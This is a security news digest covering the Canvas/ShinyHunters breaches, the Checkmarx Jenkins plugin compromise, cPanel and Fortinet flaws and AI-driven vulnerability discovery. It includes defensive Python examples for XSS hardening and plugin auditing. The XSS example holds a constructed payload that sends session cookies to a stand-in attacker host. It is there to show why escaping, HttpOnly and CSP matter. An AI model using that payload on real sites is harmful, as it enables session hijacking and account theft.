AI-Generated Zero-Day Exploited in Targeted Campaign
Google Threat Intelligence Group (GTIG) has identified criminal actors deploying an AI-generated zero-day exploit in a coordinated mass exploitation attempt. According to Google's analysis, the incident marks a significant escalation beyond AI-assisted social engineering: it demonstrates an adversary using machine learning for vulnerability discovery and exploit development rather than only for lure generation.
The development signals a tactical shift in threat actor tradecraft, compressing the exploit development cycle and potentially lowering the technical barrier to sophisticated attacks. GTIG's assessment is that this represents operational maturation beyond phishing and chatbot manipulation toward autonomous offensive capability.
Open sources - closed narratives
@sitreports
ShinyHunters Resets Leak Deadline Following Double Canvas Breach Confirmation
Nearly 9,000 schools face data exposure after a second intrusion into Instructure's Canvas systems was confirmed. The threat actor ShinyHunters has reset its deadline for releasing the compromised data, according to reporting by The Register, escalating pressure on the education technology platform.
The breach demonstrates persistent targeting of educational infrastructure, with ShinyHunters using deadline extensions as a negotiation tactic. Affected institutions remain in a critical window for incident response and stakeholder notification while the threat actor controls the timeline.
Instructure Confirms XSS Flaws Enabled Canvas Portal Defacement
Education technology provider Instructure disclosed that threat actor ShinyHunters exploited cross-site scripting vulnerabilities in Canvas LMS to inject malicious JavaScript and obtain authenticated admin access. The May 7 defacement operation followed an initial April 29 breach in which ShinyHunters claims to have exfiltrated 3.6TB of data from 8,809 educational institutions, affecting approximately 275 million records.
The attackers abused user-generated content features (stored XSS) to hijack admin sessions and inject extortion messages onto login portals, demanding ransom negotiations by May 12. Instructure temporarily disabled Free-for-Teacher accounts and restored Canvas services on May 9 after applying additional safeguards.
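The mechanism described above, stored XSS through user-generated content leading to session hijack, and the defensive controls that break each step of it, as an added example in Python. This is illustrative code written for this page, not Canvas or Instructure code; the payload, page template and cookie name are constructed assumptions and the detector is a deliberately narrow heuristic, not a sanitizer.

```python
import html
import re

# Constructed sample payload of the kind stored XSS relies on: user-supplied
# content that, if rendered verbatim, runs in every viewer's browser and
# ships their session cookie to an attacker-controlled host. Hypothetical,
# not a payload recovered from the Canvas incident.
PAYLOAD = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'

# Constructed page template; "{{content}}" is where user content is rendered.
PAGE = '<html><body><div class="profile">{{content}}</div></body></html>'

# Narrow heuristic: script tags, inline event handlers or javascript: URLs
# that sit inside a real tag. Escaped content has no '<', so it cannot match.
ACTIVE_CONTENT = re.compile(
    r"<script\b|<[^>]*\son\w+\s*=|<[^>]*javascript:", re.IGNORECASE
)


def render_unsafe(template: str, user_content: str) -> str:
    """Vulnerable: interpolates user-generated content straight into HTML."""
    return template.replace("{{content}}", user_content)


def render_safe(template: str, user_content: str) -> str:
    """Hardened: HTML-escapes the content so tags and attributes become inert text."""
    return template.replace("{{content}}", html.escape(user_content, quote=True))


def has_active_content(markup: str) -> bool:
    """True if the rendered page still carries something a browser would execute."""
    return ACTIVE_CONTENT.search(markup) is not None


def session_cookie(name: str, value: str) -> str:
    """Set-Cookie header that denies script access to the session (HttpOnly),
    restricts it to HTTPS (Secure) and blocks most cross-site sends (SameSite)."""
    return f"{name}={value}; Path=/; Secure; HttpOnly; SameSite=Lax"


def cookie_is_hardened(set_cookie: str) -> bool:
    """Check that a Set-Cookie header carries all three protective attributes."""
    attrs = {a.strip().split("=")[0].lower() for a in set_cookie.split(";")[1:]}
    return {"secure", "httponly", "samesite"} <= attrs


def csp_header(nonce: str) -> str:
    """Content-Security-Policy that only runs scripts carrying the per-response
    nonce; injected inline handlers and attacker-hosted scripts are blocked
    even if an escaping bug lets markup through."""
    return (f"default-src 'self'; script-src 'nonce-{nonce}'; "
            "object-src 'none'; base-uri 'self'")


if __name__ == "__main__":
    print("unsafe render executes payload:", has_active_content(render_unsafe(PAGE, PAYLOAD)))
    print("safe render executes payload:  ", has_active_content(render_safe(PAGE, PAYLOAD)))
    print(session_cookie("session", "example"))
    print(csp_header("r4nd0m"))
```

Escaping stops the injection; HttpOnly means that even a successful injection cannot read the session cookie with document.cookie; the nonce-based CSP is the third layer for the case where an escaping gap slips through. All three are independent, which is why a session-hijack chain of this shape needs only one of them to be missing.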
Checkmarx Jenkins Plugin Compromised in Supply Chain Attack
Checkmarx warned that a malicious version of its Jenkins Application Security Testing (AST) plugin was published to the official Jenkins Marketplace by the TeamPCP threat actors. The rogue version (2026.5.09) was uploaded May 9 using credentials stolen during the March Trivy vulnerability scanner breach and delivers credential-stealing malware to CI/CD pipelines.
The compromise marks the third incident in TeamPCP's campaign against Checkmarx since late March. Organizations using the Jenkins AST plugin should verify they are running version 2.0.13-829.vc72453fa_1c16 from December 2025, rotate every secret the affected controllers and agents could reach, and investigate for lateral movement if the malicious version was ever installed.
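A way to perform the version check above across a Jenkins controller, as an added example in Python that is not Checkmarx or Jenkins project code. Jenkins plugins are zip archives (.jpi/.hpi) under $JENKINS_HOME/plugins whose META-INF/MANIFEST.MF carries Short-Name and Plugin-Version headers; the plugin short name "checkmarx-ast-scanner" is an assumption to confirm against your own installed plugin's manifest, and the two sample manifests are constructed, not real plugin metadata.

```python
import zipfile
from pathlib import Path

# Assumed short name of the Checkmarx AST plugin (assumption; confirm against
# the Short-Name header in your installed copy) and the versions the advisory names.
AST_PLUGIN = "checkmarx-ast-scanner"
MALICIOUS_VERSIONS = {"2026.5.09"}
EXPECTED_VERSION = "2.0.13-829.vc72453fa_1c16"


def parse_manifest(text: str) -> dict:
    """Parse a JAR MANIFEST.MF into a dict. Lines beginning with a single
    space continue the previous header (the JAR spec wraps at 72 bytes)."""
    headers = {}
    last = None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if raw.startswith(" ") and last:
            headers[last] += raw[1:]
            continue
        key, _, value = raw.partition(":")
        last = key.strip()
        headers[last] = value.strip()
    return headers


def assess(short_name: str, version: str) -> str:
    """Classify one installed plugin: 'malicious', 'expected', 'unknown' or 'n/a'."""
    if short_name != AST_PLUGIN:
        return "n/a"
    if version in MALICIOUS_VERSIONS:
        return "malicious"
    if version == EXPECTED_VERSION:
        return "expected"
    return "unknown"  # neither the advisory's bad version nor the known-good one


def audit_manifests(manifests) -> list:
    """Run assess() over MANIFEST.MF texts; returns (short_name, version, verdict) tuples."""
    results = []
    for text in manifests:
        m = parse_manifest(text)
        name = m.get("Short-Name") or m.get("Extension-Name", "?")
        version = m.get("Plugin-Version", "?")
        results.append((name, version, assess(name, version)))
    return results


def audit_plugins_dir(plugins_dir: str) -> list:
    """Read META-INF/MANIFEST.MF from every .jpi/.hpi archive in a plugins directory."""
    manifests = []
    for path in sorted(Path(plugins_dir).glob("*.[jh]pi")):
        with zipfile.ZipFile(path) as z:
            manifests.append(z.read("META-INF/MANIFEST.MF").decode("utf-8", "replace"))
    return audit_manifests(manifests)


# Constructed sample manifests for offline demonstration (not real plugin metadata).
SAMPLE_GOOD = ("Manifest-Version: 1.0\nShort-Name: checkmarx-ast-scanner\n"
               "Plugin-Version: 2.0.13-829.vc72453fa_1c16\nLong-Name: Checkmarx AST\n")
SAMPLE_BAD = ("Manifest-Version: 1.0\nShort-Name: checkmarx-ast-scanner\n"
              "Plugin-Version: 2026.5.09\nLong-Name: Checkmarx AST Scann\n er\n")

if __name__ == "__main__":
    for name, version, verdict in audit_manifests([SAMPLE_GOOD, SAMPLE_BAD]):
        print(f"{name:28} {version:30} {verdict}")
    # On a real controller: audit_plugins_dir("/var/lib/jenkins/plugins")
```

The "unknown" verdict matters as much as "malicious": a version that is neither the advisory's bad build nor the known-good one should be treated as unverified until it is matched against the vendor's published checksums, because a second rogue upload would not carry the same version string.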
cPanel CVE-2026-41940 Exploited for Filemanager Backdoor
Active exploitation of CVE-2026-41940 against cPanel installations has been confirmed, with threat actors deploying a backdoor named Filemanager on compromised hosts. According to reporting, attackers are using the vulnerability to establish persistent access on web hosting infrastructure.
The exploitation pattern indicates a focus on hosting providers and shared environments, where cPanel remains widely deployed. Organizations running affected versions face immediate risk of unauthorized administrative access and lateral movement across hosted domains.
U.S. Plans Hypersonic Interceptor Demo by 2027
The Missile Defense Agency will conduct a flight test of Project Maverick along the U.S. east coast in fiscal 2027, aiming to demonstrate tracking and defeat capabilities against hypersonic missiles. The test will integrate multi-phenomenology sensor data with tactical battle management systems to direct an interceptor toward a hypersonic target, according to MDA budget documents.
The demonstration represents an interim solution while the agency's Glide Phase Interceptor program progresses toward 2031 deployment. MDA Director Lt. Gen. Heath Collins emphasized that current terminal defenses only engage threats in the endgame phase, whereas future systems will provide layered intercept opportunities against maneuvering hypersonic weapons traveling at Mach 5 or faster.
Pentagon's Strategic Capabilities Office details $1.7B operational priorities
SCO Director Jay Dryer outlined the classified office's three core portfolios at the AI+ Expo: long-range fires, autonomy and AI, and special enabling capabilities spanning cyber, electronic warfare, space and special operations. Eight focus areas include precision fires, contested logistics, collaborative systems, deception, advanced kill webs, countering adversary kill chains, extended reach survivability, and cost-effective air defense.
According to Dryer's briefing, project selection derives from combatant command requirements rather than internal preference, with built-in flexibility to adapt to testing outcomes and adversary evolution.
US Congress Demands Instructure Testimony on Canvas Breach
The House Committee on Homeland Security has summoned Instructure CEO Steve Daly to testify on two cyberattacks by ShinyHunters that compromised Canvas learning management systems, exposing data from 280 million records across 8,809 educational institutions. The breach, detected April 29, exposed student names, email addresses, and internal messages, while a second attack defaced login portals using XSS vulnerabilities during final exams.
The committee's May 12 letter questions Instructure's incident response after the company reached an undisclosed "agreement" with ShinyHunters to halt data leaks, an arrangement that typically indicates a ransom payment. Schools across 11 states reported disruptions, and the committee requested a briefing by May 21.
Foxconn Confirms Breach After Nitrogen Ransomware Claims Apple, Nvidia Data Theft
Foxconn has acknowledged a cyberattack on its manufacturing facilities following claims by the Nitrogen ransomware group of exfiltrating sensitive data allegedly belonging to Apple and Nvidia. The company states affected factories have resumed operations, though according to reporting, the scope of compromised information remains unconfirmed.
The incident highlights supply chain vulnerabilities in electronics manufacturing, where a single contractor breach can potentially expose multiple tier-one technology clients. Nitrogen's targeting of high-value manufacturing infrastructure suggests continued adversary focus on indirect access to proprietary design and production data.
UK Regulator Fines Water Company £963,900 Over Multi-Year Breach
The Information Commissioner's Office penalized South Staffordshire Water Plc after a cyberattack beginning in September 2020 exposed personal data of 663,887 customers and employees. The intrusion began with a phishing attack that installed malware, went undetected for 20 months, and had reached domain administrator access by mid-2022. Leaked data included names, addresses, bank details, and National Insurance numbers.
The investigation revealed critical security failures, including security monitoring that covered only 5% of the IT estate, continued use of Windows Server 2003, and poor vulnerability management. The fine was reduced by 40% for early admission of liability and cooperation with the regulator.
OpenAI Grants European Firms Access to GPT-5.5-Cyber Model
U.S. AI developer OpenAI has given Deutsche Telekom, BBVA, and dozens of other European companies access to its latest models, including GPT-5.5-Cyber, according to Reuters. The initiative aims to strengthen corporate defenses against system vulnerabilities through advanced AI capabilities.
The deployment signals OpenAI's strategic push to embed specialized security-focused models within critical European infrastructure sectors. The naming and stated purpose of GPT-5.5-Cyber suggest a model tuned for threat detection and resilience work in enterprise security operations; Reuters' reporting does not detail its capabilities beyond that.
FCC Extends Authorization Window for Chinese IoT Equipment Updates
The U.S. Federal Communications Commission announced Tuesday that it will permit Chinese-manufactured drones and consumer routers already sold domestically to receive critical software updates through at least December 2028, according to Reuters. The authorization applies to devices already deployed, despite broader security restrictions on Chinese communications equipment.
The decision balances supply-chain security against practical necessity: abruptly cutting off updates would leave deployed devices unpatched, a risk exceeding that of updates delivered through controlled channels. The timeline suggests a regulatory transition period that allows gradual market substitution while maintaining baseline security for deployed assets.
Signal Deploys Anti-Phishing Protections Against Account Takeover
Signal has rolled out new in-app warnings and friction points to counter social engineering attacks targeting high-profile users. The protections include "Name not verified" labels on new direct-message contacts, mandatory acceptance confirmations reminding users never to share registration codes or PINs, and expanded safety tips. The move follows multiple incidents attributed to Russian state actors who abused the Linked Devices feature via fraudulent QR codes.
The updates address a documented attack vector in which threat actors impersonate Signal Support to take over accounts and read chat histories. Users should audit their linked devices (Settings > Linked Devices) and remove any entry they do not recognize; a device linked through a phished QR code receives new messages in real time until it is unlinked.
cPanel CVE-2026-41940 Exploited for Filemanager Backdoor Deployment
Threat actors are actively exploiting CVE-2026-41940 (CVSS 9.3), an authentication bypass in cPanel and WHM versions after 11.40, to deploy a Go-based backdoor called Filemanager. The campaign, as reported by Security Affairs, has been linked to the Mr_Rot13 threat group, with over 2,000 malicious IPs targeting the flaw since its April 28 disclosure. Southeast Asian government and military institutions have been affected.
The Filemanager malware installs SSH keys, deploys PHP webshells, injects malicious JavaScript into login pages, and exfiltrates credentials via Telegram. QiAnXin XLab traces Mr_Rot13 activity back to 2020, with consistently low detection rates across security products.
Fortinet patches critical RCE flaws in FortiSandbox and FortiAuthenticator
Fortinet released security updates addressing two critical vulnerabilities that enable unauthenticated remote code execution. CVE-2026-44277 affects FortiAuthenticator through improper access control, while CVE-2026-26083 affects FortiSandbox through missing authorization checks. Both allow attackers to execute unauthorized commands via crafted HTTP requests, according to Fortinet advisories published Tuesday.
While no active exploitation has been confirmed, CISA has cataloged 24 actively exploited Fortinet vulnerabilities in recent years, indicating a high risk of rapid weaponization against enterprise IAM and sandboxing infrastructure.
Exim Mail Server Vulnerability Threatens GnuTLS Deployments
A critical vulnerability in the Exim mail transfer agent's handling of the BDAT command (the CHUNKING extension) has been identified, specifically affecting builds compiled with GnuTLS support. The flaw potentially enables remote code execution on exposed systems, according to security reporting published May 12.
Exim remains widely deployed across internet-facing mail infrastructure. Organizations running GnuTLS-based builds should prioritize patch deployment, as exploitation could grant attackers direct system access through unauthenticated SMTP interaction. Whether a given build uses GnuTLS or OpenSSL is shown in the output of `exim -bV`.
Vietnam Mandates Sovereign Cloud Infrastructure for Government Operations
Vietnam's government has outlined plans to develop domestic cloud infrastructure to replace foreign providers for state workloads by 2035. The initiative aims to establish data-driven decision-making based on real-time information while reducing dependency on overseas operators deemed security risks.
The move reflects broader regional trends toward digital sovereignty and signals potential market restrictions for Western cloud providers in Southeast Asia. Vietnam joins China and Russia in prioritizing state-controlled data infrastructure, with implications for cross-border data flows and foreign technology access.
AI-Driven Vulnerability Discovery Surges Across Major Vendors
Palo Alto Networks disclosed 75 vulnerabilities in May 2026, up from a typical five per month, after scanning its products with frontier AI models including Anthropic's Mythos. Microsoft's MDASH identified 17 new flaws in the same period, while Mozilla fixed 423 Firefox bugs in April, nearly 20 times its 2025 monthly average. All three participate in Anthropic's Project Glasswing testing program.
The surge strains defenders, since triage and patching infrastructure was not built for this volume. Palo Alto estimates a three-to-five-month window before adversaries gain equivalent AI capabilities, making proactive scanning critical despite the sharply increased patch volume it produces.